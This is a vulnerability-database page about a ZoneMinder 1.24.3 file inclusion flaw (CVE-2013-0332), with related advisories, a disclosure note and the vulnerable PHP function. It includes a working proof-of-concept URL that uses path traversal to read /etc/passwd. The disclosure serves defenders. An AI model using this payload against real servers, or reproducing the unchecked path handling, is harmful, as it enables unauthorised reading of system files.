| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| CVE-2013-0332 | 24 Jan 201300:00 | – | circl | |
| CVE-2013-0332 | 20 Mar 201315:00 | – | cve | |
| CVE-2013-0332 | 20 Mar 201315:00 | – | cvelist | |
| [SECURITY] [DSA 2640-1] zoneminder security update | 14 Mar 201318:04 | – | debian | |
| CVE-2013-0332 | 20 Mar 201315:00 | – | debiancve | |
| Debian DSA-2640-1 : zoneminder - several issues | 15 Mar 201300:00 | – | nessus | |
| ZoneMinder Video Server - packageControl Command Execution (Metasploit) | 24 Jan 201300:00 | – | exploitdb | |
| CVE-2013-0332 | 20 Mar 201315:55 | – | nvd | |
| Debian: Security Advisory (DSA-2640-1) | 13 Mar 201300:00 | – | openvas | |
| Debian Security Advisory DSA 2640-1 (zoneminder - several issues) | 14 Mar 201300:00 | – | openvas |
# Exploit Title: Zoneminder 1.24.3 Remote File Inclusion Vulnerability
# Date: 2011-07-22
# Author: Iye (iye[dot]cba-at-gmail[dot]com)
# Software Link: http://www.zoneminder.com/
# Version: 1.24.3 (Tested). 1.24.4 probably too, not tested
# Tested on: Ubuntu 10.04
You must be authenticated as a user in the Web App to exploit it. It's
not a must to be admin.
POC: http://localhost/zm/index.php?action=56&markMids%5B%5D=1&deleteBtn=Delete&editBtn=Edit&view=../../../../../../../../../../../../../../../etc/passwd%00
Reported to proyect mantainer (Philip Coombes) on 2011-07-22
Fix patch made Philip Coombes: http://www.zoneminder.com/downloads/lfi-patch.txt
Vulnerable Code:
/var/www/zm/includes/functions.php
--------------------------------------------------------
function getSkinFile( $file )
{
global $skinBase;
$skinFile = false;
foreach ( $skinBase as $skin )
{
$tempSkinFile = 'skins'.'/'.$skin.'/'.$file;
if ( file_exists( $tempSkinFile ) )
$skinFile = $tempSkinFile;
}
return( $skinFile );
}
--------------------------------------------------------Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation